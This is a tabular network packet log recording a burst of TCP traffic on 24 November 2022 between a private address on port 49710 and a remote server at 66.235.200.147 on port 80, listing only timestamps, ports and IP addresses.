Nov 24, 2022 12:20:03.325356007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325397968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325438976 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.325442076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325678110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325728893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325737953 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.325790882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325829029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325848103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325870037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325871944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.325891018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325902939 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.325911045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325927973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.325932026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325952053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325973034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325975895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.325994968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326014996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326035976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326039076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.326056004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326064110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.326076031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326096058 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326119900 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.326148033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.326545954 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326580048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326600075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326620102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326641083 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326643944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.326659918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326669931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.326679945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326693058 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.326699972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326718092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326736927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326756001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326766014 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.326776028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326796055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326801062 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.326816082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326818943 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.326836109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326857090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.326858997 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.326922894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.327389956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327410936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327430010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327444077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327462912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327483892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327502966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.327505112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327524900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327539921 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.327543974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327563047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327583075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327594995 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.327603102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327613115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.327621937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327641964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327653885 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.327662945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327682972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327696085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.327703953 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327723980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327735901 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.327744961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.327791929 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.328762054 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330003023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330025911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330044031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330063105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330082893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330085039 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330101967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330121040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330125093 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330140114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330158949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330177069 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330178022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330197096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330202103 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330216885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330235958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330238104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330255032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330271006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330275059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330296040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330316067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330333948 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330333948 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330354929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330357075 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330374956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330393076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330394030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330413103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330431938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330449104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330451012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330471039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330476046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330490112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330511093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330512047 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330529928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330549955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330552101 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330569983 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330590010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330590010 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330610037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330631018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330645084 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330650091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330670118 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330670118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330691099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330709934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330728054 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330729961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330749035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330754995 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330768108 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330781937 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330789089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330809116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330827951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330831051 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330847025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330866098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330889940 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330898046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330916882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330918074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330940008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330957890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330976009 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.330976009 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.330995083 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331001043 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.331013918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331032991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331041098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.331051111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331064939 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.331069946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331089020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331108093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331110954 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.331127882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331146002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331147909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.331193924 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.331211090 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.331504107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331525087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331543922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331578970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331588984 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.331599951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331615925 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.331619024 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331654072 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331665039 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.331690073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331726074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331763029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331764936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.331782103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331803083 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331820011 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.331824064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331841946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.331845045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331865072 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331892014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331908941 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.331912041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331931114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331932068 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.331952095 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331973076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.331975937 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.331988096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332020998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332042933 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.332067966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.332281113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332303047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332338095 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332356930 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.332356930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332376957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332396984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332417965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332420111 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.332439899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332443953 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.332459927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332480907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332500935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332503080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.332520008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332526922 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.332540035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332561016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332580090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332582951 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.332597971 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332603931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.332617998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332636118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332640886 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.332653999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332674026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332693100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332696915 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.332712889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332722902 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.332732916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332751989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332753897 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.332770109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332788944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332798958 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.332808018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332827091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332837105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.332869053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.332891941 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.333246946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333266020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333286047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333306074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333311081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.333326101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333344936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333348036 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.333376884 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.333451033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333471060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333492041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333511114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333513975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.333530903 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333537102 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.333549976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333570004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333575010 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.333589077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333609104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333627939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333631039 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.333647966 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333653927 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.333667994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333688021 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333708048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333709002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.333729029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333730936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.333748102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333767891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333786964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333789110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.333806992 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333813906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.333827019 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333846092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333849907 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.333875895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333895922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.333914995 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.333941936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.334192991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334212065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334253073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334269047 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.334274054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334292889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334311962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334331989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334332943 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.334351063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334358931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.334371090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334391117 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334397078 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.334409952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334433079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334451914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334451914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.334471941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334475994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.334491968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334511995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334515095 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.334530115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334551096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334569931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334573030 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.334590912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334597111 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.334610939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334630013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334635019 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.334650040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334669113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334688902 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334707975 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334712029 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.334727049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334755898 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.334788084 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334809065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.334893942 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.335055113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.335081100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.335100889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.335120916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.335131884 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.335146904 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.335163116 CET	80	49710	66.235.200.147	192.168.2.3
